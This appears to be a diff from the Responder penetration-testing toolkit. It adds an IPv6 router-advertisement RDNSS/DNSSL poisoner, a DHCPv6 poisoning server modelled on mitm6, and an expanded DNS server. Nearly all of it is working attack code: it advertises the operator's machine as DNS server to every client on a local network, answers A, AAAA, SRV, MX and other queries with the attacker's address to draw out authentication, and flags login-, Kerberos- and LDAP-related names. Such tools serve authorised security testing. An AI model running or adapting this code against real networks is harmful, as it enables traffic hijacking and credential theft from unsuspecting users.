ICMPV6_ROUTER_ADVERTISEMENT,
0, # Code
0, # Checksum (placeholder)
self.cur_hop_limit,
flags,
self.router_lifetime,
self.reachable_time,
self.retrans_timer
)
options = b''
if self.rdnss:
options += self.rdnss.build()
if self.dnssl:
options += self.dnssl.build()
return ra_header + options
def compute_icmpv6_checksum(source, dest, icmpv6_packet):
"""Compute ICMPv6 checksum including pseudo-header."""
src_addr = socket.inet_pton(socket.AF_INET6, source)
dst_addr = socket.inet_pton(socket.AF_INET6, dest)
pseudo_header = struct.pack(
'!16s16sI3xB',
src_addr,
dst_addr,
len(icmpv6_packet),
58 # ICMPv6
)
data = pseudo_header + icmpv6_packet
if len(data) % 2:
data += b'\x00'
checksum = 0
for i in range(0, len(data), 2):
word = (data[i] << 8) + data[i + 1]
checksum += word
while checksum >> 16:
checksum = (checksum & 0xFFFF) + (checksum >> 16)
return ~checksum & 0xFFFF
def get_link_local_address(interface):
"""Get link-local IPv6 address for interface (required for RA source)."""
try:
with open('/proc/net/if_inet6', 'r') as f:
for line in f:
parts = line.split()
if len(parts) >= 6 and parts[5] == interface:
addr = parts[0]
formatted = ':'.join(addr[i:i+4] for i in range(0, 32, 4))
if formatted.lower().startswith('fe80'):
return formatted
except FileNotFoundError:
pass
# Fallback: try netifaces
try:
import netifaces
addrs = netifaces.ifaddresses(interface)
if netifaces.AF_INET6 in addrs:
for addr in addrs[netifaces.AF_INET6]:
ipv6 = addr.get('addr', '').split('%')[0]
if ipv6.lower().startswith('fe80'):
return ipv6
except:
pass
return None
def get_dns_server_address(interface):
"""Get IPv6 address to advertise as DNS server. Uses Bind_To6 from settings."""
# Use Bind_To6 from settings (set via -6 option or config)
if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
return settings.Config.Bind_To6
# Fallback: auto-detect from interface
try:
import netifaces
addrs = netifaces.ifaddresses(interface)
if netifaces.AF_INET6 in addrs:
global_ipv6 = None
linklocal_ipv6 = None
for addr in addrs[netifaces.AF_INET6]:
ipv6 = addr.get('addr', '').split('%')[0]
if not ipv6 or ipv6 == '::1':
continue
if ipv6.lower().startswith('fe80'):
if not linklocal_ipv6:
linklocal_ipv6 = ipv6
else:
if not global_ipv6:
global_ipv6 = ipv6
# Prefer global, fall back to link-local
return global_ipv6 or linklocal_ipv6
except:
pass
# Last resort: link-local
return get_link_local_address(interface)
def send_ra(interface, source_ip, dns_server=None, dnssl_domains=None):
"""Send a single Router Advertisement."""
try:
# Build RDNSS option if DNS server specified
rdnss = None
if dns_server:
rdnss = RDNSSOption(dns_servers=[dns_server], lifetime=RA_LIFETIME)
# Build DNSSL option if domains specified
dnssl = None
if dnssl_domains:
dnssl = DNSSLOption(domains=dnssl_domains, lifetime=RA_LIFETIME)
# Build RA packet
ra = RouterAdvertisement(rdnss=rdnss, dnssl=dnssl)
# Create raw socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, interface.encode())
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS, ICMPV6_HOP_LIMIT)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_UNICAST_HOPS, ICMPV6_HOP_LIMIT)
# Build packet with checksum
packet = bytearray(ra.build())
checksum = compute_icmpv6_checksum(source_ip, IPV6_ALL_NODES, bytes(packet))
struct.pack_into('!H', packet, 2, checksum)
# Send to all-nodes multicast
sock.sendto(bytes(packet), (IPV6_ALL_NODES, 0, 0, socket.if_nametoindex(interface)))
sock.close()
return True
except PermissionError:
print(color("[!] ", 1, 1) + "RDNSS: Root privileges required for raw sockets")
return False
except OSError as e:
if settings.Config.Verbose:
print(color("[!] ", 1, 1) + "RDNSS error: %s" % str(e))
return False
def RDNSS(interface, rdnss_enabled, dnssl_domain):
"""
RDNSS/DNSSL Poisoner - Main entry point
Sends periodic Router Advertisements with DNS options:
- RDNSS: Advertises Responder as DNS server (--rdnss)
- DNSSL: Injects DNS search suffix (--dnssl)
Both options are independent and can be used separately or together.
Args:
interface: Network interface to send RAs on
rdnss_enabled: If True, include RDNSS option (DNS server)
dnssl_domain: If set, include DNSSL option (search suffix)
"""
# Get source address (must be link-local for RAs per RFC 4861)
source_ip = get_link_local_address(interface)
if not source_ip:
print(color("[!] ", 1, 1) + "RDNSS: Could not get link-local address for %s" % interface)
return
# Get DNS server address if RDNSS is enabled
dns_server = None
if rdnss_enabled:
dns_server = get_dns_server_address(interface)
if not dns_server:
print(color("[!] ", 1, 1) + "RDNSS: Could not determine IPv6 address for DNS server")
return
# Format DNSSL domain
domains = None
if dnssl_domain:
domains = [dnssl_domain] if isinstance(dnssl_domain, str) else dnssl_domain
# Startup messages
if dns_server:
print(color("[*] ", 2, 1) + "RDNSS advertising DNS server: %s" % dns_server)
if domains:
print(color("[*] ", 2, 1) + "DNSSL advertising search domain: %s" % ', '.join(domains))
print(color("[*] ", 2, 1) + "Sending RA every %d-%d seconds" % (RA_INTERVAL_MIN, RA_INTERVAL_MAX))
print(color("[*] ", 2, 1) + "Avoid self poisoning with: \"sudo ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j DROP\"")
# Send initial RA
send_ra(interface, source_ip, dns_server, domains)
# Main loop - send RAs at random intervals
while True:
interval = random.randint(RA_INTERVAL_MIN, RA_INTERVAL_MAX)
time.sleep(interval)
send_ra(interface, source_ip, dns_server, domains)

30
pyproject.toml Normal file
View File

@@ -0,0 +1,30 @@
[build-system]
requires = ["pdm-backend >= 2.4.0"]
build-backend = "pdm.backend"
[project]
name = "Responder-poisoner" # "responder" is already taken
description = "LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication."
readme = "README.md"
license = "GPL-3.0-only"
license-files = ["LICENSE"]
dynamic = ["version"]
dependencies = ["aioquic", "netifaces>=0.10.4"]
classifiers = [
"Operating System :: MacOS",
"Operating System :: POSIX :: Linux",
"Topic :: Security"
]
[project.urls]
Homepage = "https://github.com/lgandx/Responder"
Issues = "https://github.com/lgandx/Responder/issues"
[project.scripts]
responder = "Responder:main"
[tool.pdm.build]
includes = ["*.py", "files/", "poisoners/", "servers/", "certs/", "tools/", "Responder.conf"]
[tool.pdm.version]
source = "scm"

3
requirements.txt
View File

@@ -1 +1,2 @@
netifaces==0.10.4
aioquic
netifaces>=0.10.4

471
servers/DHCPv6.py Normal file
View File

@@ -0,0 +1,471 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# DHCPv6 poisoning module based on mitm6 concepts by Dirk-jan Mollema
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
import struct
import socket
import time
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
# DHCPv6 Message Types
DHCPV6_SOLICIT = 1
DHCPV6_ADVERTISE = 2
DHCPV6_REQUEST = 3
DHCPV6_CONFIRM = 4
DHCPV6_RENEW = 5
DHCPV6_REBIND = 6
DHCPV6_REPLY = 7
DHCPV6_RELEASE = 8
DHCPV6_DECLINE = 9
DHCPV6_INFORMATION_REQUEST = 11
# DHCPv6 Option Codes
OPTION_CLIENTID = 1
OPTION_SERVERID = 2
OPTION_IA_NA = 3
OPTION_IA_TA = 4
OPTION_IAADDR = 5
OPTION_ORO = 6
OPTION_PREFERENCE = 7
OPTION_ELAPSED_TIME = 8
OPTION_RELAY_MSG = 9
OPTION_AUTH = 11
OPTION_UNICAST = 12
OPTION_STATUS_CODE = 13
OPTION_RAPID_COMMIT = 14
OPTION_USER_CLASS = 15
OPTION_VENDOR_CLASS = 16
OPTION_VENDOR_OPTS = 17
OPTION_INTERFACE_ID = 18
OPTION_RECONF_MSG = 19
OPTION_RECONF_ACCEPT = 20
OPTION_DNS_SERVERS = 23
OPTION_DOMAIN_LIST = 24
class DHCPv6State:
def __init__(self):
self.leases = {}
self.start_time = time.time()
self.poisoned_count = 0
def add_lease(self, client_id, ipv6_addr, mac):
self.leases[client_id] = {
'ipv6': ipv6_addr,
'mac': mac,
'lease_time': time.time(),
'lease_duration': 120
}
self.poisoned_count += 1
dhcpv6_state = DHCPv6State()
class DHCPv6(BaseRequestHandler):
def handle(self):
try:
data, socket_obj = self.request
if len(data) < 4:
return
msg_type = data[0]
transaction_id = data[1:4]
if msg_type not in [DHCPV6_SOLICIT, DHCPV6_REQUEST, DHCPV6_CONFIRM, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_INFORMATION_REQUEST]:
return
options = self.parse_dhcpv6_options(data[4:])
client_id = options.get(OPTION_CLIENTID)
if not client_id:
return
client_mac = self.extract_mac_from_clientid(client_id)
if not self.should_poison_client():
return
msg_type_name = self.get_message_type_name(msg_type)
if settings.Config.Verbose:
print(text('[DHCPv6] %s from %s (MAC: %s)' % (
msg_type_name,
self.client_address[0],
client_mac if client_mac else 'Unknown'
)))
# Build response based on message type
if msg_type == DHCPV6_SOLICIT:
response = self.build_advertise(transaction_id, options)
response_type = 'ADVERTISE'
elif msg_type == DHCPV6_REQUEST:
response = self.build_reply(transaction_id, options, client_id, client_mac)
response_type = 'REPLY'
elif msg_type == DHCPV6_RENEW:
response = self.build_reply(transaction_id, options, client_id, client_mac)
response_type = 'REPLY (Renew)'
elif msg_type == DHCPV6_REBIND:
response = self.build_reply(transaction_id, options, client_id, client_mac)
response_type = 'REPLY (Rebind)'
elif msg_type == DHCPV6_CONFIRM:
response = self.build_confirm_reply(transaction_id, options)
response_type = 'REPLY (Confirm)'
elif msg_type == DHCPV6_INFORMATION_REQUEST:
response = self.build_info_reply(transaction_id, options)
response_type = 'REPLY (Info)'
else:
return
socket_obj.sendto(response, self.client_address)
analyze_mode = getattr(settings.Config, 'Analyze', False)
if analyze_mode:
print(color('[Analyze] [DHCPv6] Would send %s to %s' % (response_type, self.client_address[0]), 3, 1))
else:
attacker_ip = self.get_attacker_ipv6()
print(text('[DHCPv6] Sent %s to %s' % (response_type, self.client_address[0])))
if msg_type in [DHCPV6_REQUEST, DHCPV6_RENEW, DHCPV6_REBIND, DHCPV6_SOLICIT]:
print(text('[DHCPv6] Poisoned DNS server: %s' % attacker_ip))
except Exception as e:
if settings.Config.Verbose:
print(color('[!] [DHCPv6] Error: %s' % str(e), 1, 1))
import traceback
traceback.print_exc()
def should_poison_client(self):
return True
def parse_dhcpv6_options(self, options_data):
options = {}
offset = 0
while offset < len(options_data) - 4:
option_code = struct.unpack('!H', options_data[offset:offset+2])[0]
option_len = struct.unpack('!H', options_data[offset+2:offset+4])[0]
option_data = options_data[offset+4:offset+4+option_len]
options[option_code] = option_data
offset += 4 + option_len
return options
def extract_mac_from_clientid(self, client_id):
try:
if len(client_id) < 2:
return None
duid_type = struct.unpack('!H', client_id[0:2])[0]
if duid_type == 1 and len(client_id) >= 14:
mac = client_id[8:14]
return ':'.join(['%02x' % b for b in bytearray(mac)])
elif duid_type == 3 and len(client_id) >= 8:
mac = client_id[4:10]
return ':'.join(['%02x' % b for b in bytearray(mac)])
except:
pass
return None
def get_attacker_ipv6(self):
"""Get attacker's link-local IPv6 address derived from IPv4"""
# mitm6 technique: use link-local address with decimal octets
# Example: 10.207.212.254 -> fe80::a:cf:d4:fe (hex) or similar pattern
# Actually based on your example, it seems to generate a different link-local
# Let's use the actual Bind_To6 if available, otherwise construct one
try:
# Try to get actual link-local from interface
import netifaces
iface = settings.Config.Interface
addrs = netifaces.ifaddresses(iface)
if netifaces.AF_INET6 in addrs:
for addr_info in addrs[netifaces.AF_INET6]:
addr = addr_info.get('addr', '').split('%')[0]
# Return link-local address (fe80::)
if addr.startswith('fe80::'):
return addr
except:
pass
# Fallback: construct from IPv4
try:
ipv4 = settings.Config.Bind_To
octets = ipv4.split('.')
# Use hex conversion for DNS server address
ipv6 = 'fe80::%x:%x:%x:%x' % (
int(octets[0]), int(octets[1]),
int(octets[2]), int(octets[3])
)
return ipv6
except:
return 'fe80::1'
def generate_client_ipv6(self):
"""Generate client's link-local IPv6 address from attacker's IPv4"""
# mitm6 technique: fe80::<octet1>:<octet2>:<octet3>:254
# Example: 10.207.212.254 -> fe80::10:207:212:254
try:
ipv4 = settings.Config.Bind_To
octets = ipv4.split('.')
# Use decimal octets (base 10) separated by colons, last octet is always 254
ipv6 = 'fe80::%s:%s:%s:254' % (octets[0], octets[1], octets[2])
return ipv6
except:
return 'fe80::1:2:3:4'
def build_advertise(self, transaction_id, options):
msg = bytes([DHCPV6_ADVERTISE]) + transaction_id
# Client ID first
if OPTION_CLIENTID in options:
msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
# Server ID - DUID Type 3 (link-layer only, not link-layer + time)
msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
# DNS servers option - use link-local address
dns_option = self.build_dns_servers_option()
msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
# IA_NA if requested
if OPTION_IA_NA in options:
ia_na_option = self.build_ia_na_option(options[OPTION_IA_NA])
msg += self.build_option(OPTION_IA_NA, ia_na_option)
# Add domain list if configured
dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
if dhcpv6_domain:
domain_option = self.build_domain_list_option([dhcpv6_domain])
msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
return msg
def build_reply(self, transaction_id, options, client_id, client_mac):
msg = bytes([DHCPV6_REPLY]) + transaction_id
# Client ID first
msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
# Server ID - DUID Type 3
msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
# DNS servers option - use link-local address
dns_option = self.build_dns_servers_option()
msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
# IA_NA if requested - reuse the address from request if present
if OPTION_IA_NA in options:
ia_na_option = self.build_ia_na_option_reply(options[OPTION_IA_NA])
msg += self.build_option(OPTION_IA_NA, ia_na_option)
# Add domain list if configured
dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
if dhcpv6_domain:
domain_option = self.build_domain_list_option([dhcpv6_domain])
msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
# Track this lease
ipv6_addr = self.generate_client_ipv6()
dhcpv6_state.add_lease(client_id, ipv6_addr, client_mac)
return msg
def build_info_reply(self, transaction_id, options):
msg = bytes([DHCPV6_REPLY]) + transaction_id
# Client ID first
if OPTION_CLIENTID in options:
msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
# Server ID
msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
# DNS servers option
dns_option = self.build_dns_servers_option()
msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
# Add domain list if configured
dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
if dhcpv6_domain:
domain_option = self.build_domain_list_option([dhcpv6_domain])
msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
return msg
def build_confirm_reply(self, transaction_id, options):
msg = bytes([DHCPV6_REPLY]) + transaction_id
# Client ID first
msg += self.build_option(OPTION_CLIENTID, options[OPTION_CLIENTID])
# Server ID
msg += self.build_option(OPTION_SERVERID, self.get_server_duid())
# Status Code: Success (0)
status_code = struct.pack('!H', 0)
msg += self.build_option(OPTION_STATUS_CODE, status_code)
# DNS servers option
dns_option = self.build_dns_servers_option()
msg += self.build_option(OPTION_DNS_SERVERS, dns_option)
# Add domain list if configured
dhcpv6_domain = getattr(settings.Config, 'DHCPv6_Domain', '')
if dhcpv6_domain:
domain_option = self.build_domain_list_option([dhcpv6_domain])
msg += self.build_option(OPTION_DOMAIN_LIST, domain_option)
return msg
def build_option(self, code, data):
return struct.pack('!HH', code, len(data)) + data
def get_server_duid(self):
"""Get server DUID - Type 3 (link-layer only) like mitm6"""
duid_type = 3 # DUID-LL (link-layer only)
hw_type = 1 # Ethernet
# Get actual MAC address from interface
try:
import netifaces
iface = settings.Config.Interface
addrs = netifaces.ifaddresses(iface)
if netifaces.AF_LINK in addrs:
mac_str = addrs[netifaces.AF_LINK][0]['addr']
# Convert MAC string to bytes
mac = bytes([int(x, 16) for x in mac_str.split(':')])
else:
mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
except:
mac = bytes([0x02, 0x00, 0x00, 0x00, 0x00, 0x01])
# DUID Type 3 format: type (2) + hardware type (2) + link-layer address
duid = struct.pack('!HH', duid_type, hw_type) + mac
return duid
def build_ia_na_option(self, request_ia_na):
"""Build IA_NA option with link-local address for ADVERTISE"""
iaid = request_ia_na[0:4]
# Short lease times like mitm6
t1 = 200
t2 = 250
ia_na = iaid + struct.pack('!II', t1, t2)
# Add IAADDR sub-option with link-local address
ipv6_addr = self.generate_client_ipv6()
iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
ia_na += iaaddr
return ia_na
def build_ia_na_option_reply(self, request_ia_na):
"""Build IA_NA option for REPLY/RENEW/REBIND - reuse client's address if present"""
iaid = request_ia_na[0:4]
# Short lease times like mitm6
t1 = 200
t2 = 250
ia_na = iaid + struct.pack('!II', t1, t2)
# Try to extract existing address from request
ipv6_addr = None
try:
# Parse IA_NA options to find IAADDR
offset = 12 # Skip IAID + T1 + T2
while offset < len(request_ia_na) - 4:
opt_code = struct.unpack('!H', request_ia_na[offset:offset+2])[0]
opt_len = struct.unpack('!H', request_ia_na[offset+2:offset+4])[0]
if opt_code == OPTION_IAADDR and opt_len >= 16:
# Extract IPv6 address (first 16 bytes of option data)
import ipaddress
addr_bytes = request_ia_na[offset+4:offset+20]
ipv6_addr = str(ipaddress.IPv6Address(addr_bytes))
break
offset += 4 + opt_len
except:
pass
# If no address found in request, generate new one
if not ipv6_addr:
ipv6_addr = self.generate_client_ipv6()
# Add IAADDR sub-option
iaaddr = self.build_iaaddr_option(ipv6_addr, 300)
ia_na += iaaddr
return ia_na
def build_iaaddr_option(self, ipv6_addr, lease_time):
"""Build IAADDR option"""
import ipaddress
addr_bytes = ipaddress.IPv6Address(ipv6_addr).packed
# Format: IPv6 address (16) + preferred-lifetime (4) + valid-lifetime (4)
iaaddr_data = addr_bytes + struct.pack('!II', lease_time, lease_time)
# Wrap in option
return struct.pack('!HH', OPTION_IAADDR, len(iaaddr_data)) + iaaddr_data
def build_dns_servers_option(self):
"""Build DNS Servers option - use link-local address like mitm6"""
import ipaddress
attacker_ipv6 = self.get_attacker_ipv6()
dns_bytes = ipaddress.IPv6Address(attacker_ipv6).packed
return dns_bytes
def build_domain_list_option(self, domains):
domain_data = b''
for domain in domains:
labels = domain.split('.')
for label in labels:
domain_data += bytes([len(label)]) + label.encode('ascii')
domain_data += b'\x00'
return domain_data
def get_message_type_name(self, msg_type):
types = {
DHCPV6_SOLICIT: 'SOLICIT',
DHCPV6_ADVERTISE: 'ADVERTISE',
DHCPV6_REQUEST: 'REQUEST',
DHCPV6_CONFIRM: 'CONFIRM',
DHCPV6_RENEW: 'RENEW',
DHCPV6_REBIND: 'REBIND',
DHCPV6_REPLY: 'REPLY',
DHCPV6_RELEASE: 'RELEASE',
DHCPV6_DECLINE: 'DECLINE',
DHCPV6_INFORMATION_REQUEST: 'INFORMATION_REQUEST'
}
return types.get(msg_type, 'UNKNOWN(%d)' % msg_type)
def print_dhcpv6_stats():
if dhcpv6_state.poisoned_count > 0:
runtime = int(time.time() - dhcpv6_state.start_time)
print(color('\n[DHCPv6] Statistics:', 2, 1))
print(color(' Clients poisoned: %d' % dhcpv6_state.poisoned_count, 2, 1))
print(color(' Active leases: %d' % len(dhcpv6_state.leases), 2, 1))
print(color(' Runtime: %d seconds' % runtime, 2, 1))

829
servers/DNS.py Executable file → Normal file
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -14,118 +14,747 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Features:
# - Responds to A, AAAA, SOA, MX, TXT, SRV, and ANY queries
# - OPT record (EDNS0) support for modern DNS clients
# - SOA records to appear as authoritative DNS server
# - MX record poisoning for email client authentication capture
# - SRV record poisoning for service discovery (Kerberos, LDAP, etc.)
# - Logs interesting authentication-related domains
# - 5 minute TTL for efficient caching
# - Proper IPv6 support (uses -6 option, auto-detects, or skips AAAA)
# - Domain filtering to target specific domains only
#
from utils import *
from packets import DNS_Ans, DNS_SRV_Ans, DNS6_Ans, DNS_AnsOPT
import struct
import socket
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
def ParseDNSType(data):
QueryTypeClass = data[len(data)-4:]
OPT = data[len(data)-22:len(data)-20]
if OPT == "\x00\x29":
return "OPTIPv4"
# If Type A, Class IN, then answer.
elif QueryTypeClass == "\x00\x01\x00\x01":
return "A"
elif QueryTypeClass == "\x00\x21\x00\x01":
return "SRV"
elif QueryTypeClass == "\x00\x1c\x00\x01":
return "IPv6"
class DNS(BaseRequestHandler):
"""
Enhanced DNS server for Responder
Redirects DNS queries to attacker's IP to force authentication attempts
"""
def handle(self):
# Ditch it if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
try:
data, soc = self.request
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A":
buff = DNS_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
buff = DNS_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
data, socket_obj = self.request
if len(data) < 12:
return
# Parse DNS header
transaction_id = data[0:2]
flags = struct.unpack('>H', data[2:4])[0]
questions = struct.unpack('>H', data[4:6])[0]
answer_rrs = struct.unpack('>H', data[6:8])[0]
authority_rrs = struct.unpack('>H', data[8:10])[0]
additional_rrs = struct.unpack('>H', data[10:12])[0]
# Check if it's a query (QR bit = 0)
if flags & 0x8000:
return # It's a response, ignore
# Parse question section
query_name, query_type, query_class, offset = self.parse_question(data, 12)
if not query_name:
return
# Check for OPT record in additional section
opt_record = None
if additional_rrs > 0:
opt_record = self.parse_opt_record(data, offset)
# Log the query
if settings.Config.Verbose:
query_type_name = self.get_type_name(query_type)
opt_info = ''
if opt_record:
opt_info = ' [EDNS0: UDP=%d, DO=%s]' % (
opt_record['udp_size'],
'Yes' if opt_record['dnssec_ok'] else 'No'
)
print(text('[DNS] Query from %s: %s (%s)%s' % (
self.client_address[0].replace('::ffff:', ''),
query_name,
query_type_name,
opt_info
)))
# Check if we should respond to this query
if not self.should_respond(query_name, query_type):
return
# Build response
response = self.build_response(
transaction_id,
query_name,
query_type,
query_class,
data,
opt_record
)
if response:
socket_obj.sendto(response, self.client_address)
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
buff = DNS_SRV_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
except Exception:
pass
# DNS Server TCP Class
class DNSTCP(BaseRequestHandler):
def handle(self):
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
target_ip = self.get_target_ip(query_type)
if target_ip:
print(color('[DNS] Poisoned response: %s -> %s' % (
query_name, target_ip), 2, 1))
except Exception as e:
if settings.Config.Verbose:
print(text('[DNS] Error: %s' % str(e)))
def parse_question(self, data, offset):
"""Parse DNS question section and return domain name, type, class"""
try:
# Parse domain name (labels)
labels = []
original_offset = offset
while offset < len(data):
length = data[offset]
if length == 0:
offset += 1
break
# Check for compression pointer
if (length & 0xC0) == 0xC0:
# Compression pointer, stop here
offset += 2
break
offset += 1
if offset + length > len(data):
return None, None, None, offset
label = data[offset:offset+length].decode('utf-8', errors='ignore')
labels.append(label)
offset += length
domain_name = '.'.join(labels)
# Parse type and class
if offset + 4 > len(data):
return None, None, None, offset
query_type = struct.unpack('>H', data[offset:offset+2])[0]
query_class = struct.unpack('>H', data[offset+2:offset+4])[0]
offset += 4
return domain_name, query_type, query_class, offset
except:
return None, None, None, offset
def parse_opt_record(self, data, offset):
"""
Parse OPT pseudo-RR from additional section (EDNS0)
OPT RR format:
- NAME: domain name (should be root: 0x00)
- TYPE: OPT (41)
- CLASS: requestor's UDP payload size
- TTL: extended RCODE and flags (4 bytes)
- Byte 0: Extended RCODE
- Byte 1: EDNS version
- Bytes 2-3: Flags (bit 15 = DNSSEC OK)
- RDLENGTH: length of RDATA
- RDATA: {attribute, value} pairs
"""
try:
# Skip any answer/authority records to get to additional section
# For simplicity, we'll scan for OPT record (TYPE=41)
while offset < len(data):
# Check if we're at a name
if offset >= len(data):
return None
# Skip name (could be label or pointer)
name_start = offset
while offset < len(data):
length = data[offset]
if length == 0:
offset += 1
break
if (length & 0xC0) == 0xC0:
offset += 2
break
offset += length + 1
# Check if we have enough data for type, class, ttl, rdlength
if offset + 10 > len(data):
return None
rr_type = struct.unpack('>H', data[offset:offset+2])[0]
offset += 2
if rr_type == 41: # OPT record found
udp_payload_size = struct.unpack('>H', data[offset:offset+2])[0]
offset += 2
# TTL field contains extended RCODE and flags
ttl_bytes = data[offset:offset+4]
extended_rcode = ttl_bytes[0]
edns_version = ttl_bytes[1]
flags = struct.unpack('>H', ttl_bytes[2:4])[0]
dnssec_ok = bool(flags & 0x8000) # DO bit
offset += 4
rdlength = struct.unpack('>H', data[offset:offset+2])[0]
offset += 2
# RDATA contains option codes (we'll just skip for now)
rdata = data[offset:offset+rdlength] if rdlength > 0 else b''
return {
'udp_size': udp_payload_size,
'extended_rcode': extended_rcode,
'edns_version': edns_version,
'dnssec_ok': dnssec_ok,
'rdata': rdata
}
else:
# Skip this RR
offset += 2 # class
offset += 4 # ttl
if offset + 2 > len(data):
return None
rdlength = struct.unpack('>H', data[offset:offset+2])[0]
offset += 2 + rdlength
return None
except Exception as e:
if settings.Config.Verbose:
print(text('[DNS] Error parsing OPT record: %s' % str(e)))
return None
def should_respond(self, query_name, query_type):
"""Determine if we should respond to this DNS query"""
# Don't respond to empty queries
if not query_name:
return False
# Domain filtering - only respond to configured domain if set
if hasattr(settings.Config, 'DHCPv6_Domain') and settings.Config.DHCPv6_Domain:
target_domain = settings.Config.DHCPv6_Domain.lower().strip()
query_lower = query_name.lower().strip('.')
# Check if query matches domain or is a subdomain
if not (query_lower == target_domain or query_lower.endswith('.' + target_domain)):
if settings.Config.Verbose:
print(text('[DNS] Ignoring query for %s (not in target domain %s)' % (
query_name, target_domain)))
return False
# Log that we're responding to a filtered domain
if settings.Config.Verbose:
print(color('[DNS] Query matches target domain %s - responding' % target_domain, 3, 1))
# For AAAA queries, only respond if we have a valid IPv6 address
# With link-local fallback, this should almost always succeed
# Only fails if IPv6 is completely disabled on the system
if query_type == 28: # AAAA
ipv6 = self.get_ipv6_address()
if not ipv6:
return False
# Respond to these query types:
# A (1), SOA (6), MX (15), TXT (16), AAAA (28), SRV (33), ANY (255)
# SVCB (64), HTTPS (65) - Service Binding records
supported_types = [1, 6, 15, 16, 28, 33, 64, 65, 255]
if query_type not in supported_types:
return False
# Log interesting queries (authentication-related domains)
query_lower = query_name.lower()
interesting_patterns = ['login', 'auth', 'sso', 'portal', 'vpn', 'mail', 'smtp', 'imap', 'exchange', '_ldap', '_kerberos', '_gc', '_kpasswd', '_msdcs']
if any(pattern in query_lower for pattern in interesting_patterns):
SaveToDb({
'module': 'DNS',
